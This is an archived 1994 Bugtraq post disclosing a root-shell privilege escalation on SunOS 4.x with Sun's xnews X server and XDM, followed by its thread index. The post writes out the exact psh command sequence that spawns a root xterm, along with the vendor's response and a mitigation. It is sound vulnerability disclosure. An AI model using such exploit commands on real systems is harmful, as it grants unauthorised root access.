Bugtraq mailing list archives

xnews and XDM

From: grue () engin umich edu (Paul Howell)
Date: Wed, 20 Jul 1994 09:39:41 -0400


I found out a few months ago a way to get a root shell on a 
Sun running XDM and using Sun's xnews X server.

Running these commands:
/usr/openwin/bin/psh
/NeWS 3 0 findpackage beginpackage
executive
(/usr/local/bin/xterm -display localhost:0) pipe

Gives a root shell with Openwindows and SunOS 4.x.  You have
to be logged in via XDM.

I called Sun and told them about this and was told the
fix is to upgrade to Solaris, which does not use xnews but
the MIT X server instead.

I ended up changing XDM to run xnews as another user and
setting their shell to be /bin/false in the passwd file.

The psh command adheres to X server permissions.  Meaning
that if you do a 'xhost +' then anyone could run a shell
as root.  

While I haven't tried this, I imagine that if you start xnews
up by running the openwin script, and then allowed connections
to your X server (xnews) then others could get a shell as you.
 
< Paul

Current thread:

rpc.cmsd? James W. Abendschan (Jul 15)
- Re: rpc.cmsd? jsz (Jul 16)
  - Re: rpc.cmsd? Rens Troost (Jul 18)
    - Re: rpc.cmsd? jsz (Jul 18)
    - Re: rpc.cmsd? Perry E. Metzger (Jul 18)
    - Re: rpc.cmsd? Rafi Sadowsky (Jul 19)
    - Re: rpc.cmsd? Scott D. Yelich (Jul 19)
    - xnews and XDM Paul Howell (Jul 20)
    - Re: rpc.cmsd? jsz (Jul 20)
    - Re: rpc.cmsd? Perry E. Metzger (Jul 20)
    - Re: rpc.cmsd? Marc W. Mengel (Jul 19)
    - Re: rpc.cmsd? Paul Daw (Jul 18)
    - Re: rpc.cmsd? Mark (Jul 18)
    - Re: rpc.cmsd? Rens Troost (Jul 19)
    - Re: rpc.cmsd? Alfonso Gutierrez (Jul 19)
- Re: rpc.cmsd? Martin Sean Bennet - Sun UK - CSG Engineer (Jul 18)
- <Possible follow-ups>
- Re: rpc.cmsd? saouli () math ethz ch (Jul 19)
- Re: rpc.cmsd? Pat Myrto (Jul 20)